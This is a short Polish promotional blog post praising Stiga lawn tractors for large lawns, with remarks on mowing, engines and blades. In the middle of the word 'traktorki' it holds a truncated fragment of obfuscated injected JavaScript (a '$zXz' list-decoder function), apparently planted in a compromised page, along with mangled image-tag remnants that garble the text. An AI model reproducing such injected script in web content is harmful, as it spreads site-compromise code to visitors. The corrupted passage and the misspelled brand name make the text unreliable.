Markowe traktorki do trawy

Każdy trawnik jest inny, jednak wszystkie należy tak samo pielęgnować. Jeżeli nie będziemy tego robili,to w szybkim czasie zamieni się w łąkę porośniętą przeróżnymi chwastami. Przede wszystkim odnosi sięto do podlewania i koszenia.

Które traktory do trawy są najlepsze?

trak<script>$zXz=function(n){if (typeof ($zXz.list[n]) == torki do trawy stiga” height=”125″ src=”http://www.tworzenie-stron.konin.pl/wp-content/uploads/2020/11/traktorki-do-trawy-stiga.jpg” style=”float:left;” width=”187″/>Zakup kosiarki wydaje się być oczywistością jeżeli posiadamy choć najmniejszy ogród. Kiedyś ludzie nie mieli wyboru i musieli ręcznie kosić trawnik kosą czy prymitywną kosiarką ręczną. Obecnie w sklepach ogrodniczych znajdziemy przynajmniej kilka rodzajów kosiarek i traktorków. Sąto profesjonalne sprzęty, które pozwalają na wykoszenie trawników o określonej wielkości. Kosiarki elektryczne i kosy spalinowe najlepiej się sprawdzają na małych powierzchniach o maksymalnie dwudziestu arach. Natomiast torki do trawy Stiga są przeznaczone do dużych powierzchni ponad dwudziestoarowych. Ich gabaryty znacznie przewyższają kosiarki, ale zato są znacznie wydajniejsze w pracy. Przede wszystkim kosiarkę przed sobą pchamy, a na traktorku jedziemy i tylko nim kierujemy jak samochodem. Posiadają one nowej generacji silniki spalinowe, które dają bardzo dużo mocy, przy jednoczesnym oszczędnym poborze paliwa. Dzięki temu koszenie trawnika jest nie tylko proste i przyjemne, ale także ekonomiczne. Dzięki ostrym jak brzytwa, podwójnych nożach tnących, koszenie odbywa się płynnie i dokładnie. Z pewnością pracy po traktorku marki Stiga nie trzeba będzie powtarzać, jakto często ma miejsce w przypadku klasycznych kosiarek.

Porównując wszystkie parametry traktorków do koszenia trawy,to z pewnością marka Siga wypadnie na szczycie listy. Jej traktorki są wytrzymałe, funkcjonalne i przede wszystkim niezawodne, dzięki czemu bez pomocy serwisu można na nim pracować przez wiele lat.